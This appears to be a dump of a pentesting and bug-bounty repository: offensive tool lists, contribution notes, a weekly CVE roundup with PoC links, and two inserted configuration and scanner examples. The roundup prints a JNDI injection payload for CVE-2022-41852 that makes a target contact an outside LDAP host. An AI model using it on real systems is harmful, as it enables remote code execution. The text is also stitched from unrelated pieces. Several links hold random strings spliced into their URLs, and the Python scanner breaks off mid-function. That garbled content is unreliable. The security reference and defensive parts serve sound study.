 https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Pages_sites_servers_and_search_engines
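
The tiering described above (the web server serves static assets itself and forwards only business requests through a load balancer to the application servers) can be written as an Nginx configuration. This is an added example, not part of the original repository; the host name, addresses, ports and paths are constructed placeholders.

```nginx
# Constructed example: names, addresses and paths are placeholders.
events {}

http {
    include mime.types;          # correct Content-Type for CSS, JS and images

    # Load balancer role: pool of application servers (round-robin by default).
    # These sit on a private network; only the web tier should be able to reach
    # them, and only they should be able to reach the database server.
    upstream app_servers {
        server 10.0.2.11:8080;
        server 10.0.2.12:8080;
    }

    server {
        listen 80;               # TLS termination omitted to keep the example short
        server_name www.example.test;

        # Static assets are served by the web server itself.
        location /static/ {
            root /var/www/site;  # a request for /static/app.css reads /var/www/site/static/app.css
            expires 7d;
        }

        # Everything else is a business request and goes to the application tier.
        location / {
            proxy_pass http://app_servers;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
        }
    }
}
```

The rule that the application and database servers are reachable only from the tier in front of them is enforced at the network layer (firewall or security groups), not by this file.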


([Table of Contents](#table-of-contents))

# Cloud servers

![cloud-provider](https://user-images.githubusercontent.com/25515871/182293888-62d7d7be-0f8a-4220-88f9-36db7be3ac28.png)


# Basic steps of pen testing

<p align="center">
    <img src="https://www.tutorialspoint.com/penetration_testing/images/penetration_testing_method.jpg">
</p>

*Source: [tutorialspoint](https://www.tutorialspoint.com/penetration_testing/index.htm)*

[Read more about pen testing methodology](https://www.tutorialspoint.com/penetration_testing/penetration_testing_method.htm)

([Table of Contents](#table-of-contents))

# Tools by category

A more complete list of tools can be found on [Kali Linux official website](https://tools.kali.org/tools-listing).

#### :male_detective: Information Gathering

Information gathering tools allow you to collect data about services and users. Check information about a domain, IP address, phone number or an email address.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [theHarvester](https://github.com/laramies/theHarvester)      | **Python** | `Linux/Windows/macOS` | E-mails, subdomains and names Harvester. |
| [CTFR](https://github.com/UnaPibaGeek/ctfr)      | **Python** | `Linux/Windows/macOS` | Abusing Certificate Transparency logs for getting HTTPS websites subdomains. |
| [Sn1per](https://github.com/1N3/Sn1per)      | **bash** | `Linux/macOS` | Automated Pentest Recon Scanner. |
| [RED Hawk](https://github.com/Tuhinshubhra/RED_HAWK)      | **PHP** | `Linux/Windows/macOS` | All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers. |
| [Infoga](https://github.com/m4ll0k/Infoga)      | **Python** | `Linux/Windows/macOS` | Email Information Gathering. |
| [KnockMail](https://github.com/4w4k3/KnockMail)      | **Python** | `Linux/Windows/macOS` | Check if email address exists. |
| [a2sv](https://github.com/hahwul/a2sv)      | **Python** | `Linux/Windows/macOS` | Auto Scanning to SSL Vulnerability. |
| [Wfuzz](https://github.com/xmendez/wfuzz)      | **Python** | `Linux/Windows/macOS` | Web application fuzzer. |
| [Nmap](https://github.com/nmap/nmap)      | **C/C++** | `Linux/Windows/macOS` | A very common tool. Network host, vuln and port detector. |
| [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga)      | **Go** | `Linux/macOS` | An OSINT framework for phone numbers. |

#### :lock: Password Attacks

Crack passwords and create wordlists.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [John the Ripper](https://github.com/magnumripper/JohnTheRipper)      | **C** | `Linux/Windows/macOS` | John the Ripper is a fast password cracker. |
| [hashcat](https://github.com/hashcat/hashcat)      | **C** | `Linux/Windows/macOS` | World's fastest and most advanced password recovery utility. |
| [Hydra](https://github.com/vanhauser-thc/thc-hydra)      | **C** | `Linux/Windows/macOS` | Parallelized login cracker which supports numerous protocols to attack. |
| [ophcrack](https://gitlab.com/objectifsecurite/ophcrack)      | **C++** | `Linux/Windows/macOS` | Windows password cracker based on rainbow tables. |
| [Ncrack](https://github.com/nmap/ncrack)      | **C** | `Linux/Windows/macOS` | High-speed network authentication cracking tool. |
| [WGen](https://github.com/agusmakmun/Python-Wordlist-Generator)      | **Python** | `Linux/Windows/macOS` | Create awesome wordlists with Python. |
| [SSH Auditor](https://github.com/ncsa/ssh-auditor)      | **Go** | `Linux/macOS` | The best way to scan for weak ssh passwords on your network. |

###### :memo: Wordlists

| Tool        | Description    |
| ----------- |----------------|
| [All Wordlist at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)   | Wordlists sorted by probability originally created for password generation and testing. |

#### :globe_with_meridians: Wireless Testing

Used for intrusion detection and wifi attacks.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [Aircrack](https://github.com/aircrack-ng/aircrack-ng)      | **C** | `Linux/Windows/macOS` | WiFi security auditing tools suite. |
| [bettercap](https://github.com/bettercap/bettercap)      | **Go** | `Linux/Windows/macOS/Android` | bettercap is the Swiss army knife for network attacks and monitoring. |
| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin)      | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |
| [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)      | **Shell** | `Linux/Windows/macOS` | This is a multi-use bash script for Linux systems to audit wireless networks. |
| [Airbash](https://github.com/tehw0lf/airbash)      | **C** | `Linux/Windows/macOS` | A POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing. |

#### :wrench: Exploitation Tools

Access systems and data with service-oriented exploits.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [SQLmap](https://github.com/sqlmapproject/sqlmap)      | **Python** | `Linux/Windows/macOS` | Automatic SQL injection and database takeover tool. |
| [XSStrike](https://github.com/UltimateHackers/XSStrike)      | **Python** | `Linux/Windows/macOS` | Advanced XSS detection and exploitation suite. |
| [Commix](https://github.com/commixproject/commix)      | **Python** | `Linux/Windows/macOS` | Automated All-in-One OS command injection and exploitation tool. |

#### :busts_in_silhouette: Sniffing & Spoofing

Listen to network traffic or fake a network entity.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [Wireshark](https://www.wireshark.org)      | **C/C++** | `Linux/Windows/macOS` | Wireshark is a network protocol analyzer. |
| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin)      | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |
| [Zarp](https://github.com/hatRiot/zarp)      | **Python** | `Linux/Windows/macOS` | A free network attack framework. |

#### :rocket: Web Hacking

Exploit popular CMSs that are hosted online.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [WPScan](https://github.com/wpscanteam/wpscan)      | **Ruby** | `Linux/Windows/macOS` | WPScan is a black box WordPress vulnerability scanner. |
| [Droopescan](https://github.com/droope/droopescan)      | **Python** | `Linux/Windows/macOS` | A plugin-based scanner to identify issues with several CMSs, mainly Drupal & Silverstripe. |
| [Joomscan](https://github.com/rezasp/joomscan)      | **Perl** | `Linux/Windows/macOS` | Joomla Vulnerability Scanner. |
| [Drupwn](https://github.com/immunIT/drupwn)      | **Python** | `Linux/Windows/macOS` | Drupal Security Scanner to perform enumerations on Drupal-based web applications. |
| [CMSeek](https://github.com/Tuhinshubhra/CMSeek)      | **Python** | `Linux/Windows/macOS` | CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 130 other CMSs. |

#### :tada: Post Exploitation

Exploits for after you have already gained access.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [TheFatRat](https://github.com/Screetsec/TheFatRat)      | **C** | `Linux/Windows/macOS` | Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack, dll. |

### pen-testing Frameworks

Frameworks are packs of pen testing tools with custom shell navigation and documentation.

| Tool        | Language           | Support  | Description    |
| ----------- |-------------------------|----------|----------------|
| [Operative Framework](https://github.com/graniet/operative-framework)      | **Python** | `Linux/Windows/macOS` | Framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules. |
| [Metasploit](https://github.com/rapid7/metasploit-framework)      | **Ruby** | `Linux/Windows/macOS` | A penetration testing framework for ethical hackers. |
| [cSploit](https://github.com/cSploit/android)      | **Java** | `Android` | The most complete and advanced IT security professional toolkit on Android. |
| [radare2](https://github.com/radare/radare2)      | **C** | `Linux/Windows/macOS/Android` | Unix-like reverse engineering framework and commandline tools. |
| [Wifiphisher](https://github.com/wifiphisher/wifiphisher)      | **Python** | `Linux` | The Rogue Access Point Framework. |
| [Beef](https://github.com/beefproject/beef)      | **Javascript** | `Linux/Windows/macOS` | The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. |
| [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF)      | **Python** | `Linux/Windows/macOS` | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. |
| [Burp Suite](https://portswigger.net/burp)      | **Java** | `Linux/Windows/macOS` | Burp Suite is a leading range of cybersecurity tools, brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. **This tool is not free and open source** |

([Table of Contents](#table-of-contents))

## Books / Manuals

- [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
- [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
- [The Pentester BluePrint: Starting a Career as an Ethical Hacker](https://www.amazon.in/dp/1119684307/ref=cm_sw_r_cp_apa_i_XMCdGbG3PV2XD) (2014)
- [Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X) - [PDF](https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf) (2017)
- [Cybersecurity - Attack and Defense Strategies](https://www.amazon.com/Cybersecurity-Defense-Strategies-Infrastructure-securit/dp/1788475291) (2018)
- [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) (2009)
- [Social Engineering : The Art of Human Hacking](https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539) (2010)
- [The Hackers Playbook 2 by Peter Kim](https://amzn.to/2ObGqkU)

## Discussions (Updating Soon)

- [Reddit/HowToHack](https://www.reddit.com/r/HowToHack) Ask about hacking, security and pen testing.
- [Reddit/hacking](https://www.reddit.com/r/hacking) Discuss hacking and web security.
- [ax0nes](https://ax0nes.com/) Hacking, security, and software development forum.
- [0Day.rocks on discord](https://discord.gg/WmYzJfD) Discord server about the 0day.rocks blog for technical and general InfoSec/Cyber discussions & latest news.
- [Reddit/AskNetsec](https://www.reddit.com/r/AskNetsec/) Discuss network security, ask professionals for advice about jobs and stuff.

## Security Advisories

- [CVE: For publicly known cybersecurity vulnerabilities.](http://cve.mitre.org/)
- [CWE: For software weaknesses and vulnerabilities](http://cwe.mitre.org/)
- [NVD: Largest publicly available source of vulnerability intelligence.](http://web.nvd.nist.gov/)
- [OWASP: Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.
- [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.
- [PTES: Penetration Testing Execution Standard](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.
- [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.
- [Hackerone reports](https://h1.security.nathan.sx/index.html)
- [Pentester.land](https://pentester.land/list-of-bug-bounty-writeups.html)

## Must Checkout 

- [Awesome Pentesting](https://github.com/enaqx/awesome-pentest/blob/master/README.md)
- [Devbreak on Twitter](https://twitter.com/DevbreakFR)
- [The Life of a Security Researcher](https://www.alienvault.com/blogs/security-essentials/the-life-of-a-security-researcher)
- [Find an awesome hacking spot in your country](https://github.com/diasdavid/awesome-hacking-spots)
- [Awesome-Hacking Lists](https://github.com/Hack-with-Github/Awesome-Hacking/blob/master/README.md)
- [Crack Station](http://crackstation.net/)
- [Exploit Database](http://www.exploit-db.com/)
- [Hackavision](http://www.hackavision.com/)
- [Hackmethod](https://www.hackmethod.com/)
- [Packet Storm Security](http://packetstormsecurity.org/)
- [SecLists](http://seclists.org/)
- [SecTools](http://sectools.org/)
- [Smash the Stack](http://smashthestack.org/)
- [Don't use VPN services](https://gist.github.com/joepie91/5a9909939e6ce7d09e29)
- [How to Avoid Becoming a Script Kiddie](https://www.wikihow.com/Avoid-Becoming-a-Script-Kiddie)
- [2017 Top 10 Application Security Risks](https://www.owasp.org/index.php/Top_10-2017_Top_10)
- [Starting in cybersecurity ?](https://blog.0day.rocks/starting-in-cybersecurity-5b02d827fb54)



([Table of Contents](#table-of-contents))

# License

This repository is under MIT license.

([Table of Contents](#table-of-contents))


================================================
FILE: ResetCybersecuirty/CONTRIBUTING.md
================================================
# Contribution Guidelines

Please note that this project welcomes **No Code or Low Code contributions**.

Contributing to open source isn’t just for technical folks who want to write code. There are lots of opportunities to use your professional skills in support of open-source projects. The ResetHacker Community is making a point of encouraging contributions that require some technical experience or none at all. No matter your experience, you can join and contribute to ResetHacker!

RESETHACKER welcomes people of any experience level to participate, join and create. Low-code and non-code contributions are fantastic choices for folks who don’t have a lot of technical knowledge. Here are some examples of ways you can contribute to open-source projects:
	



|        | Topics          | Low code  | Non-Code    |
| ----------- |-------------------------|----------|----------------|
| 1.      | **Writing** | `Technical documentation` | Translating & Copy editing. |
| 2.      | **Design** | `Testing` | User experience testing, Graphic design and Video production. |
| 3.      | **Advocacy** | `Talks or presentations, Technical blog posts, Podcast & Case studies` | Social media & Blog posts. |

## Submitting low-code or no-code content through a pull request

<br>

- Fork this repository
- Clone this repository
- Add or Make the changes
- Add your name & github link to [Contributors](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Contributors.md)
- Wait for your pull request to be reviewed and merged!  


## Updating your Pull Request

Sometimes, a maintainer of the ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.



================================================
FILE: ResetCybersecuirty/CVE's/CVE_Assests/Beta.md
================================================
# Security Patched,  CVE : poc, analysis and Exploit.

![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)<p align=""> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md" /> </p>
<details>
 <summary><b>  
A collection of the latest proof-of-concept exploit scripts and analysis of the latest patched CVEs. 
  
  > Why, you ask? Because there are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited, and this makes you and your organization vulnerable to the latest vulnerabilities. 
  
  
  - Every week our team filters out the latest IT security CVE PoCs, updates on patched security issues, and writeups & analysis of CVEs that have been discovered, written or found by community members. The format we follow: 
  
</b></summary>

        
        # Security Patched within a Week:   Latest IT security vulnerabilities patched within this week at selected companies such as Apple, Google, :
        # CVE Analysis:                     CVE analysis and PoC for analysis.
        # PoC Exploit :                     Tracking the recently discovered PoCs of old & new CVEs. 
        
        - [CVE]
           - Target/Product: ** **
           - Affected Version/ Patched :
           - Description/Issue/Flaw :
        
</details>

---

## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.

 
      Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022),
                                      featuring releases from Mozilla, Microsoft, Jenkins, Github, Cisco, Linux (Ubuntu 22.4, 20.4 & 18.4 LTE) etc.
        
      CVE:ANALYSIS & POC:             CVE-2022-40684, Zimbra 0Day CVE-2022-41352, CVE-2022-42889/ Text4Shell, CVE-2022-37969,
                                      CVE-2022-3236 & CVE-2022-36966. 

         
      CVE POC (0-Day):                7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,
                                      CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).
                                    
<details>
<summary>
Security Patched within a Week:
 
 > We track the latest security advisories of top vendors and pick out the high and critical vulnerabilities that have been patched within a week.
</summary>
 
- *Here’s a look at the latest security issues (severity: Critical or High) patched by top vendors in the last week. If you are using an old version of any of the vendor products mentioned, avoid being tricked into opening a specially crafted website in a browsing context, which an attacker could potentially exploit; we highly recommend **upgrading or updating vendor products from the original source.***
 
 - **Mozilla Security Advisories** : 
   - Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.
 
 - **Jenkins Security Advisories** : 
   - This week Jenkins announced [vulnerabilities in multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice is to follow the advisory and update the affected plugins.
 
 - **[Cisco Security Advisories](https://tools.cisco.com/security/center/publicationListing.x)** : 
   - Cisco has released security updates for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
 
 - **GitHub Security Advisories** : 
   - [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)
   - [run-terraform allows for RCE via terraform plan ](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)
   - [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)
 
 - Several security issues were fixed in different versions of **Ubuntu** Linux kernel packages. We highly recommend updating & upgrading these packages.
   - **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library.

   - **Ubuntu 20.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.

   - **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.

 - **Microsoft** 
   - Microsoft has released security advisories to provide information about a vulnerability that exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. These advisories also provide guidance on what developers can do to update their applications to remove this vulnerability.
     - https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v
     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9
     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff
     - https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv
     - https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9
 
 - **CISA Advisories**
   > CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
     
     - ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)
     - ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)
     - ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)

</details>

<details>
<summary>
CVE Analysis, writeups & reports: (6 CVE analysis in Last 1 Week)
 
 > Every week, we collect the recently discovered writeups & reports for CVEs.  
</summary>
 
  - [Analysis: CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVtechnical-deep-dive-cve-2022-40684/)
   
     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)
     - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)
     - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&amp;page=1&amp;indices=)

     - Vendor : **Fortinet FortiGate**
     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6, and FortiSwitchManager version 7.2.0 and 7.0.0 
     - Patched : Apply updates per vendor instructions.
     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
                          
              
   - [Analysis : Exploitation of Zimbra 0-day CVE-2022-41352](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/)

       - Target/Product: **Zimbra**
       - Description/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.
 
   - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)
        - [PoC  CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)
        - Payload : [jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");]
        - Target : **Apache Commons JXPath**
        - Description : This vulnerability affects a Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including the latest version) are affected by this vulnerability. 
                                    
   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)                                         
       - [Analysis: Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)
       - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)
       - [Tool : CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)
       - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)
 
       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.
       - Solution : Upgrade to Apache Commons Text 1.10.0.
       - Description/Issue/Flaw : CVE-2022-42889 (Text4Shell) is a remote code execution vulnerability in Apache Commons Text. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect on the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.
         
   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) 
 
       - Target/Product: **Microsoft** 
       - Description/Issue/Flaw : CVE-2022-37969: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The vulnerability is caused by the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.
 
   - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)
 
       - Target/Product: **SOPHOS**
       - Description/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.
 
 
   - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)
 
       - Target/Product: **SolarWinds Platform 2022.3.**
       - Affected Version : SolarWinds <= v2022.3 and Orion Platform <= 2020.2.6 HF5.
       - Description/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to insufficient control on a URL parameter, causing an insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.
 
</details>
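
The Text4Shell entry above gives the fix as upgrading to Apache Commons Text 1.10.0 and links tools that locate the library in deployed JAR files. The following added example (not code from this repository or from the linked tools) sketches that inventory check in Python: it walks a directory, opens JAR/WAR/EAR archives including nested ones, and reports commons-text copies older than 1.10.0. The 1.5 lower bound comes from the Apache advisory rather than this page, and the sample tree and helper names are constructed for illustration.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

FIRST_AFFECTED = (1, 5, 0)  # lower bound per the Apache advisory (assumption: not on the page)
FIXED = (1, 10, 0)          # page: "Upgrade to Apache Commons Text 1.10.0"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")
MAX_DEPTH = 4                           # limit recursion into nested archives
MAX_NESTED_BYTES = 256 * 1024 * 1024    # skip implausibly large nested entries
POM_PROPS = "META-INF/maven/org.apache.commons/commons-text/pom.properties"
NAME_RE = re.compile(r"(?:^|/)commons-text-(\d+(?:\.\d+)*)[^/]*\.jar$")


def parse_version(text):
    """'1.9' -> (1, 9, 0); None when the string holds no number."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts))) if parts else None


def is_affected(version):
    parsed = parse_version(version)
    return parsed is not None and FIRST_AFFECTED <= parsed < FIXED


def commons_text_version(zf, label):
    """Version of commons-text this archive is (or shades in), else None."""
    if POM_PROPS in zf.namelist():
        # Maven metadata survives renaming and shading, so prefer it.
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        match = re.search(r"^version=(\S+)", props, re.MULTILINE)
        if match:
            return match.group(1)
    match = NAME_RE.search(label)  # fall back to the file name
    return match.group(1) if match else None


def scan_archive(data, label, depth=0):
    """Return [(location, version)] for affected copies in one archive."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        version = commons_text_version(zf, label)
        if version and is_affected(version):
            findings.append((label, version))
        if depth < MAX_DEPTH:
            for info in zf.infolist():
                nested = info.filename.lower().endswith(ARCHIVE_SUFFIXES)
                if nested and info.file_size <= MAX_NESTED_BYTES:
                    inner_label = f"{label}!/{info.filename}"
                    findings += scan_archive(zf.read(info), inner_label, depth + 1)
    return findings


def scan_tree(root):
    """Scan every JAR/WAR/EAR below root, in sorted path order."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings += scan_archive(path.read_bytes(), path.as_posix())
    return findings


def make_jar(entries):
    """Build an in-memory archive from {entry name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
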